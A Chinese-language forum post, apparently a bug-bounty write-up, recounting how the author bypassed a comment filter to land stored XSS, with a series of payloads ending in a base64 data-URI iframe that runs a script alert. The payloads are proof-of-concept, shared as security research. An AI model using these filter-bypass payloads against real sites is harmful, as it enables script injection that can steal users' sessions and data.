• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

存储型XSS的发现经历和一点绕过思路


风后奇门

Recommended Posts

某SRC提现额度竟然最低是两千,而已经有750的我不甘心呐,这不得把这2000拿出来嘛。
之后我就疯狂的挖这个站,偶然发现了一个之前没挖出来的点,还有个存储型XSS!
刚开始来到这个之前挖过但没挖出来的站,看了一下感觉这站没啥东西了啊,然后来到评论区又一次测试了一下
先简单测试一下
心态:随意吧
img src=0>
35181579033615.png
结果是一空的,啥也没有
97441579033616.png
59151579033616.png
普通的没用肯定是过滤了,想着直接抓包测试吧更快些
抓包后发现编码过
编码后:
%3Cimg+src%3D%22javascript%3Aalert('XSS')%22%3E
编码前:
img src="javascript:alert('XSS')">
有个javascript肯定是会拦截的,毕竟是大厂嘛
48281579033617.png
然后直接手打吧,去掉javascript
空格用+来表示吧
0>
46441579033618.png
96271579033618.png
虽然是空的,但是发现源码中是存在img的但是被转义了,还是有些转机的\^_^
81771579033619.png
心态:有点小郁闷
来尝试绕过转义
%00 代替空格
0%00>
88211579033620.png
继续绕过
#src=0>
90831579033620.png
再来!
img\/src=0>
55171579033621.png
有转机啊!可以看到 / 被转移成空格了
心态:兴奋
直接上
img/src=0/onerror=alert(/xss/)>
63791579033622.png
可惜,被拦截了,应该是关键字alert接触()就拦截,onerror接触=就拦截
绕过一下,加空格和 %00 会被转义,试着用 / 来空格,alert 用 top['alert']来代替
但是!不顶用啊
心态:失落
70341579033622.png
用过 /**/ %00 大小写 eval 等 常用的都被干掉了,结束了?!
这不一定要用  啊,来试试
78821579033623.png
心态:!!!柳暗花明又一村
83091579033624.png
24611579033624.png
接下来直接上吧,script标签肯定用不了了
试试
iframe/src=vbscript:msgbox(123)>iframe>
17381579033625.png
能写进去但是好像执行不了,继续绕
心态:坚持,执着,绞尽脑汁
试了各种绕的方法,突然想到 明着不行,那就来暗的
明码不行,那就试试base64编码后的看看它会拦截不
script>alert(/xss/)script>
 编码一下
30031579033625.png
来直接上
Payload iframe/src=data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=>iframe>

19681579033627.png
43821579033627.png
62451579033628.png
65621579033629.png
完美大功告成!!这个套路我在这个站足足挖到3个存储XSS,还是很开心的

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now